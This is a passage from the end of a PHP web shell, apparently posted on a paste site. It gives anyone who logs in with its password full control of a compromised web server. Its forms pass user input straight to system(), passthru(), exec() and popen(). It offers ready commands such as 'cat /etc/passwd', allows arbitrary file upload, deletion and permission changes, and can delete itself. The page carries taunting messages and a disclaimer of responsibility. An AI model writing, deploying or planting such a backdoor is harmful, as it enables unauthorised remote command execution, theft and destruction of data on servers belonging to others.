  1512.                     <a  style="font-size:12px;font-family:sans-serif;color: <?php echo $color?>;" href="<?php echo $self ?>?go=<?php echo $dir.$file ?>&action=files"><b>[ <font color="pink"><?php echo $file ?></font> ]</b></a>
  1513.                     <?php echo HumanReadableFilesize(dirSize($dir.$file));?>
  1514.                     <font color="pink"><?php echo getFilePermissions($dir.$file);?></font> <font color="#666">> </font><?php echo getperms($dir); ?>
  1515.                     <a id="za" style="margin-right:30px" href="<?php echo $self;?>?delete=<?php echo $dir.$file;?>&action=files">Delete</a>
  1516.                     <a id="za" style="margin-right:10px" href="<?php echo $self;?>?action=files&rename=<?php echo $dir.$file;?>">Rename</a>
  1517.                 <a id="za" style="margin-right:10px" href="<?php echo $self;?>?zip=<?php echo $dir.$file;?>&action=files">Download</a>
  1518.                     <a id="za" style="margin-right:25px" href="<?php echo $self;?>?action=upload&path=<?php echo $dir.$file;?>">Upload</a><br>
  1519.                     </span>
  1520.                 <?php
  1521.                 }
  1522.                 //Its a file
  1523.                 else
  1524.                 {
  1525.                     ?>
  1526.                     <span id="onmouseover">
  1527.                     <a style="font-family: Optima, Segoe, "Segoe UI", Candara, Calibri, Arial, sans-serif;color: <?php echo $color?>;" href='<?php echo $self ?>?view=<?php echo $dir.$file ?>'><?php echo $file ?></a>
  1528.                     <font color="orange"><?php echo HumanReadableFilesize(filesize($dir.$file));?></font>
  1529.                     <font color="yellow"><?php echo getFilePermissions($dir.$file);?></font> <font color="#666">> </font><?php echo getperms($dir.$file); ?>
  1530.                     <a id="za" style="margin-right:30px" href="<?php echo $self;?>?delete=<?php echo $dir.$file;?>&action=files">Delete</a>
  1531.                     <a id="za" style="margin-right:10px" href="<?php echo $self;?>?action=files&rename=<?php echo $dir.$file;?>">Rename</a>
  1532.                 <a id="za" style="margin-right:10px" href="<?php echo $self;?>?zip=<?php echo $dir.$file;?>">Download</a><br>
  1533.                     </span>
  1534.                     <?php
  1535.                 }
  1536.             }
  1537.         }
  1538.         closedir($handle);
  1539.         }
  1540.     }
  1541.     else
  1542.     {
  1543.         echo "<p class='alert_red' id='margins'>Permission Denied</p>";
  1544.     }
  1545.  
  1546.  
  1547. ?>
  1548. </div>
  1549. <?php
  1550. }
  1551. ?>
  1552. <br><br>
  1553. <?php
  1554. if(!isset($_GET['action']) && !isset($_GET['upload']) && !isset($_GET['get']) && !isset($_GET['turnoff']) && !isset($_GET['view']) && !isset($_GET['db'])){
  1555. ?>
  1556. <div id="commands">
  1557. <form action="" method="get">
  1558. <font color="#333333"><b>Execute command</b></font> <input type="text" name="command" value="ls -la">
  1559. <input type="submit" value="Ex3cut3">
  1560. </form><br>
  1561. <form action="" method="get">
  1562. <font color="#333333"><b>Ready commands</b></font>
  1563. <select name="command">
  1564.   <option>whoami</option>
  1565.   <option>netstat -an</option>
  1566.   <option>ls -la</option>
  1567.   <option>ls</option>
  1568.   <option>uname -a</option>
  1569.   <option>dir</option>
  1570.   <option>start cmd.exe</option>
  1571.   <option>cat /etc/passwd</option>
  1572.   <option>cat /etc/hosts</option>
  1573. </select>
  1574. <input type="submit" value="Ex3cut3">
  1575. </form><br>
  1576. <form action="" method="get">
  1577. <font color="#333333"><b>Create file &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; &nbsp;&nbsp;</b></font> <input type="text" id="move" name="make">
  1578. <input type="submit" value="Ex3cut3">
  1579. </form><br>
  1580. <form action="" method="get">
  1581. <font color="#333333"><b>Chmod file &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; &nbsp;&nbsp;</b></font> <input type="text" name="thefile" value="File Name" style="width:110px">
  1582. <input type="text" name="thefileval" value="0777" style="width:44px">
  1583. <input type="submit" value="Ex3cut3"> <span style="color: #333333;font-family: Tahoma, Geneva, sans-serif;font-size:12px;"> ~~~~ </span>
  1584. <select name="comm">
  1585. <option>chmod</option>
  1586. <option>chown</option>
  1587. <option>chgrp</option>
  1588. </select>
  1589. </form><br>
  1590. <form action="" method="get">
  1591. <font color="#333333"><b>Passthru &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</b></font> <input type="text" name="thepass" value="whoami">
  1592. <input type="submit" value="Ex3cut3">
  1593. </form><br>
  1594. <form action="" method="get">
  1595. <font color="#333333"><b>Exec&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</b></font> <input type="text" name="theexec" value="whoami">
  1596. <input type="submit" value="Ex3cut3">
  1597. </form><br>
  1598. <form action="" method="get">
  1599. <font color="#333333"><b>Popen&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</b></font> <input type="text" name="popen" value="start cmd.exe">
  1600. <input type="submit" value="Ex3cut3">
  1601. </form><br>
  1602.  
  1603. <?php
  1604. }
  1605.  
  1606. if(isset($_GET['thepass'])){
  1607. echo '<textarea id="sourcea">';
  1608. passthru($_GET['thepass']);
  1609. echo '</textarea>';
  1610. }
  1611. if(isset($_GET['theexec'])){
  1612. echo '<textarea id="sourcea">';
  1613. if(!function_exists('exec')){
  1614. die('Exec command is blocked blocked by admin');
  1615. }
  1616. else{
  1617. echo exec($_GET['theexec']);
  1618. echo '</textarea>';
  1619. }
  1620. }
  1621. if(isset($_GET['popen'])){
  1622. echo '<textarea id="sourcea">';
  1623. if(!function_exists('popen')){
  1624. die('Popen command is blocked blocked by admin');
  1625. }
  1626. else{
  1627. popen($_GET['popen'], "r");
  1628. echo '</textarea>';
  1629. }
  1630. }
  1631.  
  1632. if(isset($_GET['thefile'])){
  1633. $file = $_GET['thefile'];
  1634. $new = $_GET['thefileval'];
  1635.         if($_GET['comm'] == 'chmod')
  1636.         {
  1637.             $ch_ok = chmod($file,$new);
  1638.             echo "Permission Changed.";
  1639.         }
  1640.         else if($_GET['comm'] == 'chown')
  1641.         {
  1642.             $ch_ok = chown($file,$new);
  1643.             echo "Owner Changed.";
  1644.         }
  1645.         else if($_GET['comm'] == 'chgrp')
  1646.         {
  1647.             $ch_ok = chgrp($file,$new);
  1648.             echo "Group Changed.";
  1649.         }
  1650. }
  1651.  
  1652.  
  1653. if(isset($_FILES['upload'])){
  1654. //file upload
  1655.     echo '<center>';
  1656. if(isset($_POST['location']) && !empty($_POST['location'])){
  1657. $target_path = $_POST['location'];
  1658. $target_path = $target_path.'/';
  1659. }
  1660. else{
  1661. $target_path = "";
  1662. }
  1663. echo "<font color=\"green\">File ".basename($_FILES["upload"]["name"])."</font> uploaded.<br>";
  1664. if(move_uploaded_file($_FILES["upload"]["tmp_name"], $target_path . $_FILES["upload"]["name"])){
  1665.     echo "The file ".basename($_FILES["upload"]["name"]).
  1666.     " has been uploaded";
  1667. } else{
  1668.     echo "There was an error uploading the file, please try again!";
  1669. }
  1670.     echo '</center>';
  1671. }
  1672.  
  1673. if(isset($_GET['dirmake'])){
  1674. // change directory
  1675. $dir = $_GET['dirmake'];
  1676. ?><font color="#228B22">Command executed</font><br> <font color="#333333">
  1677. <?php
  1678. echo '<b>Last dir:</b></font><font color="yellow"> '.getcwd() . "</font><br>";
  1679.  
  1680. chdir($dir);
  1681.  
  1682. // current directory
  1683. echo '<b>New dir:</b></font><font color="yellow"> '.getcwd() . "</font><br>";
  1684. ?>
  1685. <?php
  1686. }
  1687.  
  1688. if(isset($_GET['command'])){
  1689. $command = $_GET['command'];
  1690. if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
  1691. if(preg_match("/ls/", $command)||preg_match("/cat/", $command)||preg_match("/grep/", $command)||preg_match("/wget/", $command)||preg_match("/apt-get/", $command)||preg_match("/install/", $command)||preg_match("/mkdir/", $command)){
  1692.     echo '<font color="#A52A2A"><b>This command dont work on windows!</b></font> ';
  1693.     }
  1694. }
  1695. if (strtoupper(substr(PHP_OS, 0, 3)) === 'UNI') {
  1696. if(preg_match("/ls/", $command)||preg_match("/tree/", $command)||preg_match("/cd../", $command)){
  1697.     echo '<font color="#A52A2A"><b>This command dont work on linux!</b></font> ';
  1698.     }
  1699. }
  1700. ?>
  1701. <textarea id="sourcea">
  1702. <?php
  1703. system($command);
  1704. ?>
  1705. </textarea></div>
  1706. <?php
  1707. }
  1708. ?>
  1709. <?php
  1710. // ============================
  1711. // get action
  1712. // ============================
  1713. if(isset($_GET['action']) && !empty($_GET['action'])){
  1714. $action = $_GET['action'];
  1715. if($action == "phpinfo"){
  1716. phpinfo();
  1717. }
  1718.  
  1719. if($action == 'upload'){
  1720.     ?>
  1721.     <center>
  1722. <form action="" method="post" enctype="multipart/form-data">
  1723. <font color="#333333"><b>Upload file</b></font> <input type="file" name="upload"> <b>Upload to</b> <input type="text" name="location" value="<?php if(isset($_GET['path'])){echo $_GET['path'];} ?>">
  1724. <input type="submit" value="Ex3cut3">
  1725. </form><br></center>
  1726. <?php
  1727. }
  1728.  
  1729. if($action == "kill"){
  1730. echo 'Do you really want to delete this shell ? &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ';
  1731. ?>
  1732. <a style="padding: 5px;border:1px solid #333333;color:#333333;" href="?action=killit">Yes</a> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
  1733. <a style="padding: 5px;border:1px solid #333333;color:#333333;" href="<?php echo $_SERVER['PHP_SELF']; ?>">No</a>
  1734. <?php
  1735. }
  1736. if($action == "killit"){
  1737. $file = $_SERVER['PHP_SELF'];
  1738. $file = str_replace('/', '', $file);
  1739. unlink($file);
  1740. echo '<center><font color="#333333">Bitch u killed me o.O</font></center>';
  1741. header('refresh: 2; '.$_SERVER['PHP_SELF'].'');
  1742. }
  1743. if($action == "logout"){
  1744. unset($_SESSION['loggedin']);
  1745. echo '<center><font color="#333333">Logged out.</font></center>';
  1746. }
  1747.  
  1748.  
  1749. }
  1750.  
  1751. }
  1752. // ================================
  1753. // else login
  1754. else{
  1755. if(isset($_SESSION['banned'])){
  1756. if($_SESSION['banned'] == '3'){
  1757. die($about.'
  1758. </body>
  1759. </html>');
  1760. }
  1761. }
  1762. ?>
  1763. <br><br><br><br><br><br><br><br><center><h1>Login!</h1><br>
  1764. <form action="" method="post">
  1765. <input type="password" value="xaxaxa" name="pass" style="background:green"><br><br>
  1766. <input type="submit" value="LogoN">
  1767. </form>
  1768. </center>
  1769. <?php
  1770. }
  1771.  
  1772. if(isset($_POST['pass']) && !empty($_POST['pass'])){
  1773. $pass = $_POST['pass'];
  1774. if($pass > 50){
  1775. die("pass 2 long dud3");
  1776. }
  1777. if($pass != $password){
  1778. if(isset($_SESSION['banned'])){
  1779. if($_SESSION['banned'] == '1'){
  1780. $_SESSION['banned'] = '2';
  1781. die("Wrong password kid and +1 more attemp BANNED");
  1782. }
  1783. if($_SESSION['banned'] == '2'){
  1784. $_SESSION['banned'] = '3';
  1785. die("Wrong password kid and BANNED");
  1786. }
  1787. }
  1788. else{
  1789. $_SESSION['banned'] = '1';
  1790. }
  1791. }
  1792. else{
  1793. $_SESSION['loggedin'] = 'true';
  1794. echo "<center><b>Logged in kid</b> &nbsp;&nbsp;&nbsp; <p>redirecting..</p> <a href=\"#\">or click here</a></center>";
  1795. header('location: '.$_SERVER['PHP_SELF']);
  1796. }
  1797. }
  1798. ?>
  1799. <span style="color: #333333;font-family: Tahoma, Geneva, sans-serif;font-size:12px;"><center>[<font color="red">+</font>] I hate defacing sites and shows no skills!<br />[<font color="red">+</font>] Read the EULA carefully<br />[<font color="red">+</font>] Im not rensponsable for any shit<br />[<font color="green">+</font>] HBD Albania<br />
  1800. <?php
  1801. if(!isset($_SESSION['loggedin'])){echo $about;}
  1802. if (strtoupper(substr(PHP_OS, 0, 3)) === 'UNI'){
  1803. echo "user = ".@get_current_user()." | uid= ".@getmyuid()." | gid= ".@getmygid();
  1804. } ?>
  1805. </center></span>
  1806. </body>
  1807. </html>
Add Comment
Please, Sign In to add comment